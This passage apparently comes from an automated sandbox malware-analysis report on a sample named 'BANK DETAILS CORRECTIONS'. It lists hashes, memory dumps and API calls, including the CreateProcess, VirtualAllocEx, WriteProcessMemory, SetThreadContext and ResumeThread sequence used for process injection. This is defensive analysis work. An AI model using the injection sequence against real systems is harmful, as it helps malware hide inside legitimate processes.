                                                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 019ACFBD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000C.00000002.1418954641.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_12_2_18f0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallFilterFunc@8
                                                                                    • String ID: @$@4rw@4rw
                                                                                    • API String ID: 4062629308-2979693914
                                                                                    • Opcode ID: 9938afca379be3cb8d1f71a1816f923f6521a913f4f963022d04871ada954842
                                                                                    • Instruction ID: 96a7fed9ebe167b10b79ced584561e20a320a0f062dbca1561162129e699c918
                                                                                    • Opcode Fuzzy Hash: 9938afca379be3cb8d1f71a1816f923f6521a913f4f963022d04871ada954842
                                                                                    • Instruction Fuzzy Hash: 4A41E475940225EFDB21DFE9C840AADBBF8FF98B10F00442AE909DB254D734D905CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:9.7%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:230
                                                                                    Total number of Limit Nodes:9
52577->52578 52579 4cd2e47 CallWindowProcW 52577->52579 52578->52576 52579->52576 52581 4cd2e2a 52580->52581 52582 4cd2e7a 52580->52582 52584 4cd2e58 CallWindowProcW 52581->52584 52585 4cd2e47 CallWindowProcW 52581->52585 52583 4cd2e40 52583->52557 52584->52583 52585->52583 52587 4cd0c07 52586->52587 52588 4cd435a CallWindowProcW 52587->52588 52589 4cd4309 52587->52589 52588->52589 52589->52557 52591 4cd2e69 52590->52591 52596 4cd42a0 52590->52596 52591->52571 52594 4cd2e69 52593->52594 52595 4cd42a0 CallWindowProcW 52593->52595 52594->52571 52595->52594 52597 4cd0bfc CallWindowProcW 52596->52597 52598 4cd42aa 52597->52598 52598->52591
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F8807E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06F8807E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 04BCB0C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 04CD4381
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366234503.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4cd0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 04BC59C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 04BC59C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F87C50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1847 6f87bb9-6f87c0e 1849 6f87c1e-6f87c5d WriteProcessMemory 1847->1849 1850 6f87c10-6f87c1c 1847->1850 1852 6f87c5f-6f87c65 1849->1852 1853 6f87c66-6f87c96 1849->1853 1850->1849 1852->1853
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06F87C50
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1867 4bcc9e0-4bcd3d4 DuplicateHandle 1869 4bcd3dd-4bcd3fa 1867->1869 1870 4bcd3d6-4bcd3dc 1867->1870 1870->1869
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04BCD306,?,?,?,?,?), ref: 04BCD3C7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1873 6f875eb-6f8763b 1875 6f8764b-6f8767b Wow64SetThreadContext 1873->1875 1876 6f8763d-6f87649 1873->1876 1878 6f8767d-6f87683 1875->1878 1879 6f87684-6f876b4 1875->1879 1876->1875 1878->1879
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F8766E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1883 6f87ca9-6f87d3d ReadProcessMemory 1886 6f87d3f-6f87d45 1883->1886 1887 6f87d46-6f87d76 1883->1887 1886->1887
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F87D30
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1891 6f875f0-6f8763b 1893 6f8764b-6f8767b Wow64SetThreadContext 1891->1893 1894 6f8763d-6f87649 1891->1894 1896 6f8767d-6f87683 1893->1896 1897 6f87684-6f876b4 1893->1897 1894->1893 1896->1897
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06F8766E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    control_flow_graph 1901 6f87cb0-6f87d3d ReadProcessMemory 1904 6f87d3f-6f87d45 1901->1904 1905 6f87d46-6f87d76 1901->1905 1904->1905
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06F87D30
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F87B6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04BCB141,00000800,00000000,00000000), ref: 04BCB352
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04BCB141,00000800,00000000,00000000), ref: 04BCB352
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F87B6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F8BA05
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06F8BA05
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1368783630.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_6f80000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 04BCB0C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1365540614.0000000004BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4bc0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 74844a5d08fbbc6278c510827a9a06c2f1b835c8fe43fc4256c980365fd2130e
                                                                                    • Instruction ID: 2579f4e11f93214d3ebccb70e1f4a3bf6dbdb23a0f4de30c9b58c43e50f89ce5
                                                                                    • Opcode Fuzzy Hash: 74844a5d08fbbc6278c510827a9a06c2f1b835c8fe43fc4256c980365fd2130e
                                                                                    • Instruction Fuzzy Hash: 0C511571E00268DFDB15CFA9D994BDEBBF1BF88308F148129E815AB250D771A846CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 982ad64c6ba0839e64551239a1cb72f601caa2794041dc3c6a91b25c830986c7
                                                                                    • Instruction ID: f0728a74831beeed50f6c993a807e6280c83cebc60bd28e1870c6c13877eb99c
                                                                                    • Opcode Fuzzy Hash: 982ad64c6ba0839e64551239a1cb72f601caa2794041dc3c6a91b25c830986c7
                                                                                    • Instruction Fuzzy Hash: 5241BE74E002688FEB14EF68C2543EDBAB2EF9832DF144529C801B7241DF74A980CBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 57093d24b35a92478dd277ea79fc4d5c63c706e98d5e38531a8d035e47fca3ff
                                                                                    • Instruction ID: 88445c1dd1013dd64fb19afddca7eee1ffca102ec430cd9772f10eaa9a61964e
                                                                                    • Opcode Fuzzy Hash: 57093d24b35a92478dd277ea79fc4d5c63c706e98d5e38531a8d035e47fca3ff
                                                                                    • Instruction Fuzzy Hash: 62518F38601218AFCB54DF69D984D9EBBB6FF48724B114099F905AB361DB31EC81CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 198e173f3c73ae235c86bb86d3dfc0c57a2c46419784558d62fbc3734386aa60
                                                                                    • Instruction ID: 582a1c06dc7f683ccf67003ffd04e692c73ee406517808fa9a8c05c78c13987a
                                                                                    • Opcode Fuzzy Hash: 198e173f3c73ae235c86bb86d3dfc0c57a2c46419784558d62fbc3734386aa60
                                                                                    • Instruction Fuzzy Hash: 8141FC34A002298FDB54EFA8C994BDEB7F1FF58708F114199E505AB3A1DB79E801CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c279ece8f54ac71a9013ec0006772bf89c55c84084730a7e9b5440ebb072efd4
                                                                                    • Instruction ID: 04c2ca2dff5c9af5b0ad207f3b9abdd163a9f536ab0d855d6d6c7d207c1e3804
                                                                                    • Opcode Fuzzy Hash: c279ece8f54ac71a9013ec0006772bf89c55c84084730a7e9b5440ebb072efd4
                                                                                    • Instruction Fuzzy Hash: 53312535A00219EFEB05EFA4C954AAEBBB2FFD8304F144569E502BB350DF74A905CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 32cd261f468a3a99e145409bbbd2ab33134136eca3469f1f3162e8989a2bc954
                                                                                    • Instruction ID: e5542903fce3f5fa237aea4e41c0608d97b10d0d57d91801c0d0a4e9c82fefcb
                                                                                    • Opcode Fuzzy Hash: 32cd261f468a3a99e145409bbbd2ab33134136eca3469f1f3162e8989a2bc954
                                                                                    • Instruction Fuzzy Hash: C4413775D1474A8BCB10DFA9C84469EFBF4FF89310F10852AE918B7600E774A685CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a5143d99c849a2c3c54656fdcffcbca6f80132fa7ff01c4e78ee76db3becb165
                                                                                    • Instruction ID: aede02a0de7b04f2ad8271742ba9154d1d5585596e048e6b6623d9139e38e5b3
                                                                                    • Opcode Fuzzy Hash: a5143d99c849a2c3c54656fdcffcbca6f80132fa7ff01c4e78ee76db3becb165
                                                                                    • Instruction Fuzzy Hash: 2B3101317002148FEB18EB39C85476F77E7EFC9610B1886A9E405EB361DE34AC4687A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 88508ba60fecdb1750aeadfb9fac4eb756e24a213be8879e51a52f98d3868ee4
                                                                                    • Instruction ID: 565db483682d9b7408978b28fde723e4129bf9142066333c8231825c73be467b
                                                                                    • Opcode Fuzzy Hash: 88508ba60fecdb1750aeadfb9fac4eb756e24a213be8879e51a52f98d3868ee4
                                                                                    • Instruction Fuzzy Hash: A1314AB6910209AFDF10DFA9D844A9EBFF5EF48310F10842AE909E7310D775A940CFA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0211368afc474a185ba50ff8f1c052fcb6ae93eb8f9b0d3ab5a79d7fc9f2bd52
                                                                                    • Instruction ID: 1e4bda47a8029c669d6851fdeafa574e7dcdfd4c93054fd9dc5c3b99eb5a3ac6
                                                                                    • Opcode Fuzzy Hash: 0211368afc474a185ba50ff8f1c052fcb6ae93eb8f9b0d3ab5a79d7fc9f2bd52
                                                                                    • Instruction Fuzzy Hash: D741B1B0D10368EFDB14CF9AD994A9EFBB1BF48314F50822AE818BB210D7746845CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 30c6d70917aef5f3402618378d7167ee38e19d5e83bc59683861ece655314ccc
                                                                                    • Instruction ID: 42ca464f36a1cae217d86fbd8234c18ce2a2b70a5b1609412140dd5f860debd4
                                                                                    • Opcode Fuzzy Hash: 30c6d70917aef5f3402618378d7167ee38e19d5e83bc59683861ece655314ccc
                                                                                    • Instruction Fuzzy Hash: B431B071E00264DFEB19AF79C2503ED7BA2EB98318F204438D812AB241EF759985CB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1367536488.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_52f0000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5f4331bb9b727a7e19b73a810e7ed79f972e97c20f538b79aea00dd4781ff5a4
                                                                                    • Instruction ID: 5632b1c92a4fa1a3599601fc120a201b131fc8e3b65efe305c4e54e8b34d435b
                                                                                    • Opcode Fuzzy Hash: 5f4331bb9b727a7e19b73a810e7ed79f972e97c20f538b79aea00dd4781ff5a4
                                                                                    • Instruction Fuzzy Hash: 2641E771465B08CBE700AF15F28A2687FB1FB45319F5140E6E094922C8CFB649F5CB89
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.1366373905.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_4d20000_fcLfLlfpmjf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b51a2f96ed547d68aa0ec24cdea177e9cd32445622a6bf1c5f8d0cea99d6790a
